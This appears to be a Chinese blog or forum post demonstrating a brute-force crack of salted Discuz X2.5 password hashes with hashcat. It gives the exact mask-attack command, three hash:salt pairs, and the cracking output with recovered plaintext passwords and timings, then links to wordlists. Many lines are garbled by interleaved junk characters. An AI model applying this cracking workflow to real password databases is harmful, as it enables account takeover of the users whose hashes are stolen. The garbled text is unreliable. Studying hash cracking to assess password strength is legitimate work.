爆破、破解Disduz x 2.5 md5(md5(pass)$salt)密码加密

admin

测试环境
OS 名称: Microsoft® Windows Server® 2008 Enterprise
& P, H+ l5 R7 d: K$ e- F6 \+ EOS 版本: 6.0.6001 Service Pack 1 Build 6001
! z+ `- S" i- y) D( F+ ~; I$ |OS 制造商: Microsoft Corporation
OS 配置: 独立服务器
OS 构件类型: Multiprocessor Free
注册的所有人: Windows 用户
系统型号: PowerEdge R620
# J4 [: \, C5 ?3 E3 T4 D系统类型: x64-based PC
处理器: 安装了 1 个处理器。
[01]: Intel64 Family 6 Model 45 Stepping 7 GenuineIntel ~2400
. C  Y* W# x5 b3 X8 G& x( `cat md5.txt
3fb78e9bc0b297e3de4e77531766c37a:f29f95 /* = md5中无法查询的。*/
865a697fb9b4bd9c6737432aaff136bd:22dc87 /* = 304892415 */
15b7a21513f24ffe97d9f9830acf51ad:07626c /* = 123456 */
; ?( U1 g% h* b /* -a 使用穷举模式 -m HASH的类型是VB DISCUZ跟DV加密是一样，?d是代表数字 穷举10个数字 */ hashcat-cli64.exe -a 3 -m 2611 md5.txt ?d?d?d?d?d?d?d?d?d?d
0 n, M$ v7 r: cInput.Mode: Mask (?d?d?d?d?d)
Index…..: 0/1 (segment), 100000 (words), 0 (bytes)
Recovered.: 0/3 hashes, 0/3 salts
Speed/sec.: – plains, – words
, `: r: ?" _% ]Progress..: 100000/100000 (100.00%)
: F# a* N/ L' f- x5 c0 m& K' nRunning…: –:–:–:–
9 F( S2 S, x" y; i- `/ ^Estimated.: –:–:–:–
15b7a21513f24ffe97d9f9830acf51ad:07626c:123456
3 P$ k$ R, T; ?- TInput.Mode: Mask (?d?d?d?d?d?d)
Index…..: 0/1 (segment), 1000000 (words), 0 (bytes)
Recovered.: 1/3 hashes, 1/3 salts
3 C# _0 H) C% zSpeed/sec.: 7.43M plains, 3.72M words
. K& V3 r1 C" R8 a( _* ], rProgress..: 1000000/1000000 (100.00%)
9 d" X3 I3 @  y, g5 ARunning…: 00:00:00:01
( v& O4 C8 o- J! PEstimated.: –:–:–:–
Input.Mode: Mask (?d?d?d?d?d?d?d)
! m- X- r, z7 i4 n' h, pIndex…..: 0/1 (segment), 10000000 (words), 0 (bytes)
' |2 x/ W! F; @- s$ fRecovered.: 1/3 hashes, 1/3 salts
Speed/sec.: 13.67M plains, 6.83M words
* }/ M! [; n0 {; }2 D- vProgress..: 10000000/10000000 (100.00%)
3 n4 w. d6 L$ }7 CRunning…: 00:00:00:01
Estimated.: –:–:–:–
Input.Mode: Mask (?d?d?d?d?d?d?d?d)
Index…..: 0/1 (segment), 100000000 (words), 0 (bytes)
+ Z8 K! O9 l# z9 b+ q% HRecovered.: 1/3 hashes, 1/3 salts
Speed/sec.: 18.59M plains, 9.29M words
% s/ [; g8 a6 GProgress..: 100000000/100000000 (100.00%)
1 j) E2 P' z3 ^3 _Running…: 00:00:00:11
Estimated.: –:–:–:–
0 j( {. W6 v- k1 \# C/ U) V865a697fb9b4bd9c6737432aaff136bd:22dc87:304892415
可以看到破解 9位3开纯数字密码需要11秒。
( _; R8 E  |1 q3 y0 _: }+ r1 u! tInput.Mode: Mask (?d?d?d?d?d?d?d?d?d?d)
, ?8 X2 X( K- E# r$ Q/ j: XIndex…..: 0/1 (segment), 10000000000 (words), 0 (bytes)
Recovered.: 2/3 hashes, 2/3 salts
Speed/sec.: 12.70M plains, 12.70M words
Progress..: 10000000000/10000000000 (100.00%)
Running…: 00:00:13:07
- @, _5 d5 @  Q) W- ~" C0 T: FEstimated.: –:–:–:–
而10个数字即需要13分钟，这样的速度如果有服务器是8核或更多，或者自己GPU强劲，会更加快，我测试只是用了一个入门级的CPU。
在这里可以下载到一些字典，不过国人对这些字典貌似无视。
http://blog.g0tmi1k.com/2011/06/dictionaries-wordlists.html